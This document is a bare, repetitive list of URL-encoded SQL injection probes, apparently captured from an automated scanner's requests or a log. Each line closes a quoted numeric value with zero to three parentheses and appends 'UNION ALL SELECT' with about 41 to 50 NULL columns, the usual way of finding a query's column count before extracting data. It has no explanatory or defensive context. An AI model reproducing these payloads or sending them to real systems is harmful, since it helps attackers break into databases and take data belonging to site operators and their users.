1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 